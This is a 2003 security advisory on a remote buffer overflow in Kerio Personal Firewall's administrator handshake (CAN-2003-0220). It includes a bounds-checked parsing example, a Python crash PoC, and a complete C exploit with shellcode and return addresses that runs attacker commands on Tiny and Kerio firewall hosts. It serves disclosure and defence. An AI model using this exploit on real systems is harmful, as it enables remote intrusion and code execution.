NSFOCUS Security Monthly, Issue 41: Latest Vulnerabilities
Date: 2003-06-03
Published: 2003-04-28
Updated: 2003-05-15
Affected systems:
Kerio Personal Firewall 2 2.1.4
Kerio Personal Firewall 2 2.1.3
Kerio Personal Firewall 2 2.1.2
Kerio Personal Firewall 2 2.1.1
Kerio Personal Firewall 2 2.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 7180
CVE(CAN) ID: CAN-2003-0220
Kerio Personal Firewall (KPF) is a personal firewall product.
The administrative authentication handling of Kerio Personal Firewall contains a flaw: a remote attacker can send a forged packet that triggers a buffer overflow and may execute arbitrary code on the system with administrator privileges.
When an administrator connects to the firewall, a handshake is performed to set up an encrypted session. The fourth packet of the handshake (the first packet is sent by the administrator) carries 4 bytes of data: a fixed value, 0x40 (64), that announces the size of the following packet, which contains the administrator key. The firewall reads the announced amount with recv() without checking it against the size of its buffer. If an attacker sends a forged packet announcing an oversized length, the data is read into the fixed-size memory buffer and overflows it; carefully crafted data may allow arbitrary code execution on the system with administrator privileges.
<*Source: Core Security Technologies Advisory
Link: http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
http://marc.theaimsgroup.com/?l=bugtraq&m=105242677013515&w=2
*>
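The length-prefixed key packet described above, read with the bounds check the advisory says is missing, as an added example: this is not code from the advisory, from Kerio, or from the PoCs that follow. It stands in for the socket with an in-memory byte stream (constructed here), assumes a 4-byte big-endian length field as the PoC's struct.pack('!L', ...) implies, and uses KEY_BUF_MAX = 0x40 as the assumed receive-buffer size. The three packets it parses are constructed: a normal one announcing 0x40, one announcing the PoC's 0x149c, and one that announces 0x40 but is cut short.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Assumptions from the advisory text and PoC: handshake packet 4 carries a
 * 4-byte big-endian length, normally 0x40 (64), giving the size of the
 * admin-key packet that follows. KEY_BUF_MAX is this example's assumed
 * receive-buffer size, not a value taken from the product. */
#define KEY_LEN_EXPECTED 0x40u
#define KEY_BUF_MAX      0x40u

enum { KEY_OK = 0, KEY_ERR_SHORT = -1, KEY_ERR_TOOBIG = -2, KEY_ERR_TRUNC = -3 };

/* In-memory stand-in for a socket (constructed), so the example runs offline. */
typedef struct {
    const uint8_t *data;
    size_t len;
    size_t pos;
} stream_t;

static size_t stream_recv(stream_t *s, uint8_t *out, size_t want)
{
    size_t avail = s->len - s->pos;
    size_t n = avail < want ? avail : want;
    memcpy(out, s->data + s->pos, n);
    s->pos += n;
    return n;
}

/* Read the length field, then the key bytes, into key_buf of key_buf_size.
 * The vulnerable engine performed the same two reads but, per the advisory,
 * passed the announced length straight to recv() on a fixed-size buffer. */
int read_key_packet(stream_t *s, uint8_t *key_buf, size_t key_buf_size,
                    uint32_t *announced)
{
    uint8_t hdr[4];
    if (stream_recv(s, hdr, sizeof hdr) != sizeof hdr)
        return KEY_ERR_SHORT;

    uint32_t n = ((uint32_t)hdr[0] << 24) | ((uint32_t)hdr[1] << 16) |
                 ((uint32_t)hdr[2] << 8)  |  (uint32_t)hdr[3];
    if (announced)
        *announced = n;

    /* The missing check. A legitimate client announces 0x40; the PoC announces
     * 0x149c, so logging this rejection is also a usable detection signal. */
    if (n > key_buf_size)
        return KEY_ERR_TOOBIG;

    size_t got = 0;
    while (got < n) {
        size_t r = stream_recv(s, key_buf + got, n - got);
        if (r == 0)
            return KEY_ERR_TRUNC;   /* peer closed before sending n bytes */
        got += r;
    }
    return KEY_OK;
}

static int run_case(const uint8_t *pkt, size_t pkt_len, uint32_t *announced)
{
    stream_t s = { pkt, pkt_len, 0 };
    uint8_t key[KEY_BUF_MAX];
    return read_key_packet(&s, key, sizeof key, announced);
}

/* Constructed packet: length 0x40 followed by 64 key bytes (zeros). */
int demo_benign(void)
{
    static const uint8_t pkt[4 + KEY_LEN_EXPECTED] = { 0x00, 0x00, 0x00, 0x40 };
    uint32_t n = 0;
    int rc = run_case(pkt, sizeof pkt, &n);
    return (rc == KEY_OK && n == KEY_LEN_EXPECTED) ? KEY_OK : -99;
}

/* Constructed packet announcing the PoC's 0x149c; only a few filler bytes
 * follow because the reader must reject before reading any of them. */
int demo_oversized(void)
{
    static const uint8_t pkt[] = { 0x00, 0x00, 0x14, 0x9c, 'A', 'A', 'A', 'A' };
    uint32_t n = 0;
    int rc = run_case(pkt, sizeof pkt, &n);
    return (rc == KEY_ERR_TOOBIG && n == 0x149c) ? KEY_ERR_TOOBIG : -99;
}

/* Constructed packet announcing 0x40 but delivering only 3 bytes. */
int demo_truncated(void)
{
    static const uint8_t pkt[] = { 0x00, 0x00, 0x00, 0x40, 0x01, 0x02, 0x03 };
    return run_case(pkt, sizeof pkt, NULL);
}

int main(void)
{
    printf("benign: %d  oversized: %d  truncated: %d\n",
           demo_benign(), demo_oversized(), demo_truncated());
    return 0;
}
```

The check compares the announced length against the size of the buffer that will receive it, not against the expected constant alone, so a future change to the buffer size cannot silently reopen the overflow; the truncated case shows why the read loop must also stop on a closed connection rather than spinning on a short receive.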
Test method:
--------------------------------------------------------------------------------
Warning
The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Users bear the risk themselves!
---------------------
# Python 2 syntax, as published
import os
import socket
import struct
import string

def g():
    fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        fd.connect(('192.168.66.160', 44334))
        # read the firewall's handshake replies
        fd.recv(10)
        fd.recv(256)
        # announce an oversized key-packet length instead of 0x40
        fd.send(struct.pack('!L', 0x149c))
        astr = 'A'*0x149c
        fd.send(astr)
    except Exception, e:
        print e
        pass
    fd.close()

g()
---------------------
ThreaT (ThreaT@Ifrance.com) provided the following test program:
/**************************************************************
* Personal Firewall Engine remote buffer overflow Exploit
**************************************************************
*
* Original information shared by CORE Security Technologies.
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Released : 30/04/2003
*
* Coded By ThreaT.
* ThreaT@Ifrance.com
* http://s0h.cc/~threat
*
********************************************************************
*
* This exploit takes advantage of the vulnerability discovered by
* CORE Security Technologies to execute a command on remote workstations
* equipped with the following PSW :
*
* - Tiny Personal Firewall 2.0.15
* - Kerio Personal Firewall 2.1.4
*
*********************************************************************
*
* Usage : PFExploit.exe <target> <victim_ip> <command to execute>
*
* =====================================================================
* !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
* =====================================================================
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>      /* printf()/puts(); not pulled in by the headers above */

#define len 0x1494

void main (int argc, char *argv[])
{
    SOCKET sock1;
    SOCKADDR_IN sin;
    int i;
    DWORD byte = htonl(len);
    char buffer[len], *p,
        shellcode[] =
        "\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
        "\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
        "\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
        "\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
        "\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
        "\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
        "\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
        "\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
        "\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
        "\xD9\xFF\xFF\xFF";
    WSADATA wsadata;
    WORD wVersionRequested = MAKEWORD (2,0);
    struct _target {
        char Name[4];
        char *RetAddr;
        char *App;
    } targ[2] = {
        {"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
        {"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
    };

    printf ("#############################################################\n"
            "Personal Firewall Engine, Remote buffer overflow Exploit !\n"
            "#############################################################\n"
            "Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
            "ThreaT@Ifrance.com\n"
            "http://s0h.cc/~threat\n-\n\n");

    if (argc < 4)
    {
        printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
                "TARGET ARE\n"
                "__________\n\n"
                "TPF : for Tiny Personal Firewall 2.0.15\n"
                "KPF : for Kerio Personal Firewall 2.1.4\n\n");
        ExitProcess (0);
    }

    if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
    {
        printf ("error, cannot allocate memory\n");
        ExitProcess (0);
    }

    memset (buffer,0x90,len);
    strcpy (p,shellcode);
    lstrcat (p,argv[3]);
    memcpy (&buffer[200],p,strlen (p)+1);

    for (i=0; i < 2 ; i++)
        if (!lstrcmpi (argv[1],targ[i].Name)) break;

    if (i > 1)
    {
        printf ("Erreur : la cible %s est inconnue\n",argv[1]);
        ExitProcess (0);
    }

    if (WSAStartup(wVersionRequested, &wsadata))
    {
        printf ("Erreur d'initialisation Winsock\n");
        ExitProcess (0);
    }

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr=inet_addr (argv[2]);
    sin.sin_port = htons (44334);

    memcpy (&buffer[0x1490],targ[i].RetAddr,4);

    printf ("Cible : %s\n\n"
            "Connecting to %s...", targ[i].App, argv[2]);

    sock1 = socket (AF_INET, SOCK_STREAM, 0);
    bind (sock1, (SOCKADDR *)&sin, sizeof (sin));

    if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
    {
        printf ("connexion failed !\n");
        ExitProcess (0);
    }

    printf ("ok!\n\n"
            "sending crash for remote execution of '%s'...",argv[3]);
    Sleep (1000);

    send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
    send (sock1,buffer,len,0);

    puts ("ok");
}
Recommendations:
--------------------------------------------------------------------------------
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Disable the Kerio Personal Firewall remote administration interface.
The Skin of Humanity security group provides the following third-party patch:
Source:
http://www.s0h.cc/~threat/goodies/PFpatch/sources_PFpatch.zip
Binary:
http://www.s0h.cc/~threat/goodies/PFpatch/PFpatch.exe
Vendor patch:
Kerio
-----
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.kerio.com/
All rights reserved. Reproduction without permission is prohibited.